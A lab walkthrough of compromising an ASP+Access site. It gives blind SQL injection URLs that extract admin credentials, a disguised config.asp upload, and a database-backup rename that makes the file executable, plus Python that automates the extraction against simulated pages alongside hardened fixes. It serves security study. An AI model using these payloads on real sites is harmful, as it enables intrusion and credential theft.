Lab 11: asp+access Case of SQL injection

Source: Internet
Author: User
Tags: sql injection

For learning reference only; study notes recorded 2013.5.8.

Qianjiang Aquatic case
(SQL injection, asp+access)
Purpose of the lab: use the injection vulnerability to get config.asp uploaded to the server.
The lab runs as follows:
Prerequisite: IIS is set up on the server.
Start the lab.
Copy the packaged site to the server over a share, unzip the Qianjiang Aquatic package,
and put the files under C:\inetpub\wwwroot. Then open IIS Manager from the command line with inetmgr,
set up the Default Web Site and point its home directory at the Qianjiang Aquatic folder, enable parent paths in the configuration settings, add index.asp to the default documents, and enable ASP under Web Service Extensions.
When the web server is ready, open the Qianjiang Aquatic site from the client.
Now we use a few simple hand-typed queries to work out whether the site has an injection point.
Open the site by entering http://192.168.2.4 in the address bar, then click the "Wuhan aquatic experts" item on the page.
The address becomes http://192.168.2.4/shownews.asp?id=41; a numeric id parameter like this is the typical injection point.
Opening shownews.asp we can search for "Wuhan aquatic experts" and confirm that this news item is read from the database,
so next we look for the "select" statement that reads it.
Below is the Qianjiang Aquatic page as built on the server.

http://192.168.2.4/shownews.asp?id=41   query OK (this is the normal page that everything below is compared against)

Three probes are enough to decide whether there is an injection vulnerability (1-3); the requests that follow use the same parameter to enumerate the admin table.
1. http://192.168.2.4/shownews.asp?id=41'   query not normal (the extra quote breaks the SQL statement)

2. http://192.168.2.4/shownews.asp?id=41 and 1=1   query OK

3. http://192.168.2.4/shownews.asp?id=41 and 1=2   query not normal

4. http://192.168.2.4/shownews.asp?id=41 and select username,password from user   query error (a bare select is not a condition; the tests below wrap the subquery in parentheses)

5. http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(*) from admin)   normal access, so a table named admin exists

6. http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(*) from admin1)   not accessed properly, so there is no admin1 table

7. http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(user) from admin)   query OK

8. http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(password) from admin)

9. http://192.168.2.4/shownews.asp?id=41 and (select top 1 len(user) from admin)>0   normal

10. http://192.168.2.4/shownews.asp?id=41 and (select top 1 len(user) from admin)>1   normal

11. http://192.168.2.4/shownews.asp?id=41 and (select top 1 len(user) from admin)>2   normal. Keep raising the number in the same way until a request fails; the first number that fails is the length of the field. Next we guess its characters.

12. http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(user,1,1)) from admin)>0   error

13. http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(username,1,1)) from admin)>0   normal, so the column is username rather than user

14. http://192.168.1.10/shownews.asp?id=41 and (select top 1 len(username) from admin)>1

15. http://192.168.1.10/shownews.asp?id=41 and (select top 1 len(username) from admin)>2   the same as before: raise the number until a request fails, and the first number that fails is the length of the user name

16. http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(username,1,1)) from admin)>0   now guess the administrator's account one character at a time: raise the number until the comparison fails, the first number that fails is the ASCII code of the first character, then repeat with mid(username,2,1) for the second character and so on


Below, step by step, the password is guessed with little Aoi.

17. http://192.168.2.4/shownews.asp?id=41 and (select top 1 len(password) from admin)>0   now guess the length of the password

18. http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(password,1,1)) from admin)>0   now guess the password itself, character by character as with the user name

The password guessing with little Aoi, step by step.
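The manual sequence in probes 1 to 18, automated, as an added example that is not part of the original write-up. The vulnerable shownews.asp is a constructed stand-in backed by sqlite3 so the script runs offline: "top 1" is stripped before execution because SQLite has no TOP, and len, mid and asc are registered as user functions so the Jet-dialect payloads run unchanged. The host name, the admin row ('admin', 'a1b2c3') and the page bodies are assumptions; against a real target fetch() would be an HTTP GET. fetch_fixed() is the hardened form of the same page, with the id cast to an integer and bound as a parameter, and is included so the same probes can be seen failing against it.

```python
"""Boolean-based blind SQL injection through shownews.asp?id=, automated.
Added example, not code from the original post: the vulnerable page is a
constructed sqlite3-backed stand-in so it runs offline, while the payloads
are the Jet/Access dialect (top 1, len, mid, asc) typed by hand above."""
import re
import sqlite3
from urllib.parse import parse_qs, urlencode, urlsplit

TARGET = "http://192.168.2.4/shownews.asp"   # host from the write-up


def _make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table news(id integer, title text)")
    db.execute("insert into news values (41, 'Wuhan aquatic experts')")
    db.execute("create table admin(username text, password text)")
    db.execute("insert into admin values ('admin', 'a1b2c3')")  # made-up row
    # Jet functions the payloads rely on, emulated as SQLite user functions
    db.create_function("len", 1, lambda s: len(s))
    db.create_function("mid", 3, lambda s, i, n: s[i - 1:i - 1 + n])
    db.create_function("asc", 1, lambda s: ord(s[0]) if s else 0)
    return db


_DB = _make_db()


def _id_param(url):
    return parse_qs(urlsplit(url).query).get("id", [""])[0]


def fetch(url):
    """Simulated vulnerable shownews.asp: id is pasted into the SQL unquoted
    and unchecked.  A failing query yields an error page, which is what the
    write-up records as 'query not normal'."""
    sql = "select title from news where id=" + _id_param(url)   # the bug
    sql = re.sub(r"\btop\s+1\b", "", sql, flags=re.I)   # SQLite has no TOP
    try:
        row = _DB.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "Microsoft JET Database Engine error: %s" % exc
    return "<h1>%s</h1>" % row[0] if row else "<h1>no such news</h1>"


def fetch_fixed(url):
    """Hardened page: id must parse as an integer and is bound as a
    parameter, so attacker text never reaches the SQL parser."""
    try:
        news_id = int(_id_param(url))
    except ValueError:
        return "<h1>bad request</h1>"
    row = _DB.execute("select title from news where id=?", (news_id,)).fetchone()
    return "<h1>%s</h1>" % row[0] if row else "<h1>no such news</h1>"


BASELINE = fetch(TARGET + "?id=41")   # the untouched page to compare against


def probe(cond, page=fetch):
    """True when 'id=41 and <cond>' renders exactly like the untouched page."""
    return page(TARGET + "?" + urlencode({"id": "41 and " + cond})) == BASELINE


def is_injectable(page=fetch):
    """The and 1=1 / and 1=2 differential (probes 2 and 3 above)."""
    return probe("1=1", page) and not probe("1=2", page)


def table_exists(table):
    return probe("0<>(select count(*) from %s)" % table)


def column_exists(table, col):
    return probe("0<>(select count(%s) from %s)" % (col, table))


def field_length(table, col):
    """Raise N in len(col)>N until the page breaks; that N is the length."""
    n = 0
    while probe("(select top 1 len(%s) from %s)>%d" % (col, table, n)):
        n += 1
    return n


def field_value(table, col, length):
    """One character per position via binary search on asc(mid(col,i,1))>k:
    eight requests per character instead of counting up from 0."""
    out = ""
    for i in range(1, length + 1):
        lo, hi = 0, 255
        while lo < hi:
            k = (lo + hi) // 2
            if probe("(select top 1 asc(mid(%s,%d,1)) from %s)>%d" % (col, i, table, k)):
                lo = k + 1        # character code is above k
            else:
                hi = k            # character code is k or below
        out += chr(lo)
    return out


def dump_admin():
    """The whole manual sequence in one call: (username, password) or None."""
    if not is_injectable() or not table_exists("admin"):
        return None
    return tuple(field_value("admin", c, field_length("admin", c))
                 for c in ("username", "password"))


if __name__ == "__main__":
    print("injectable:", is_injectable(), "/ after fix:", is_injectable(fetch_fixed))
    print("admin credentials:", dump_admin())
```

Run as a script it reports that the stand-in page is injectable, that fetch_fixed() is not, and the recovered credentials. The oracle is exactly the one the write-up uses (page identical to the baseline or not); binary search over asc(mid()) only changes how many requests each character costs.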

Now the administrator's account has been identified and the password has been guessed as well.
Next we put them to use.
Find "Site management" at the bottom of the Qianjiang Aquatic site and enter the administrator's account and password to go straight into the backend.
Then open the news editor page and find "Insert picture". This upload can be used to get our config.asp onto the server, but it only accepts jpg and gif, so
go back to the client, change the extension of config.asp to gif or jpg, and upload that.
Then find where the file was stored and enter that address in the client's address bar: it cannot be run, because a .jpg is served as a picture rather than handed to the ASP engine.
So go to the file upload area under System Management, find the database backup function, make a backup and note the backup path.
In the backup form, give the path of the uploaded picture as the current database path and give the backup a file name ending in .asp; the backup copies the picture to that name.
Then copy that address and enter the path of the new config.asp in the address bar.


Fill in the contents here, upload, and note the path reported after the upload.

From here further files can be uploaded through config.asp, followed by privilege escalation, telnet, planting a backdoor, clearing the logs and so on; that series of steps is not demonstrated here.
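The database backup trick above, simulated in a temporary directory, as an added example rather than the site's code. The backend is modelled, not copied: backup_naive() takes both form fields on trust, which is the behaviour the write-up relies on; backup_checked() is the hardened form, which ignores the submitted source path, always copies the real database, and forces the destination to a .mdb name inside the backup folder. The folder names UploadFiles and DataBak, the placeholder contents of config.asp and the asp_would_run() stand-in for IIS script mapping are assumptions.

```python
"""The 'database backup' rename from the write-up, simulated on a temp
directory.  Added example, not the Qianjiang Aquatic site's code: the
backend is modelled, with backup_naive() trusting both form fields and
backup_checked() as the hardened form."""
import os
import shutil
import tempfile

# Constructed stand-in for what config.asp contains (not a working shell).
CONFIG_ASP = b'<% Response.Write("config.asp would run here") %>'


def setup_site():
    """Web root with the live database, the upload folder and the backup
    folder; the attacker's config.asp is already uploaded as config.jpg."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "UploadFiles"))
    os.makedirs(os.path.join(root, "DataBak"))
    with open(os.path.join(root, "data.mdb"), "wb") as f:
        f.write(b"Standard Jet DB")          # placeholder database bytes
    with open(os.path.join(root, "UploadFiles", "config.jpg"), "wb") as f:
        f.write(CONFIG_ASP)
    return root


def backup_naive(root, current_db, backup_name):
    """Vulnerable panel: copies whatever path the form names to whatever
    destination the form names, so config.jpg can be 'backed up' as .asp."""
    dst = os.path.join(root, backup_name)
    shutil.copyfile(os.path.join(root, current_db), dst)
    return dst


def backup_checked(root, current_db, backup_name):
    """Hardened: the submitted source is ignored and the real database is
    always the source; the destination is reduced to a basename, must end
    in .mdb, and must resolve inside DataBak."""
    live_db = os.path.join(root, "data.mdb")
    bak_dir = os.path.realpath(os.path.join(root, "DataBak"))
    name = os.path.basename(backup_name)          # drops ../ and folder parts
    stem, ext = os.path.splitext(name)
    if not stem or ext.lower() != ".mdb":
        raise ValueError("backup name must end in .mdb")
    dst = os.path.realpath(os.path.join(bak_dir, name))
    if os.path.dirname(dst) != bak_dir:
        raise ValueError("backup must stay inside DataBak")
    shutil.copyfile(live_db, dst)
    return dst


def asp_would_run(path):
    """Stand-in for IIS script mapping: only a .asp reaches the ASP engine."""
    return os.path.splitext(path)[1].lower() == ".asp"


def attack(backup):
    """Submit the write-up's form values to the given backup handler and
    report whether an .asp holding the uploaded bytes is the result."""
    root = setup_site()
    try:
        dst = backup(root, os.path.join("UploadFiles", "config.jpg"),
                     os.path.join("DataBak", "config.asp"))
    except ValueError:
        return False
    with open(dst, "rb") as f:
        return asp_would_run(dst) and f.read() == CONFIG_ASP


if __name__ == "__main__":
    print("naive backup gives a runnable config.asp:", attack(backup_naive))
    print("checked backup gives a runnable config.asp:", attack(backup_checked))
```

attack(backup_naive) comes back True because the picture is copied to DataBak/config.asp unchanged; attack(backup_checked) comes back False. The check is on the basename and the resolved real path rather than on the submitted string, so a name carrying ../ cannot escape the backup folder, and the source field is not trusted at all.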

Summary: for learning reference only, from notes organized on 2013.5.8. Do not do anything illegal; offenders bear the consequences. I only provide a learning platform for study and reference, and I hope you use this for vulnerability testing as part of your own company's security protection, not to infringe on other people's property, cause economic loss, or leak personal privacy. Note again that this is for learning reference only; do not do illegal things.
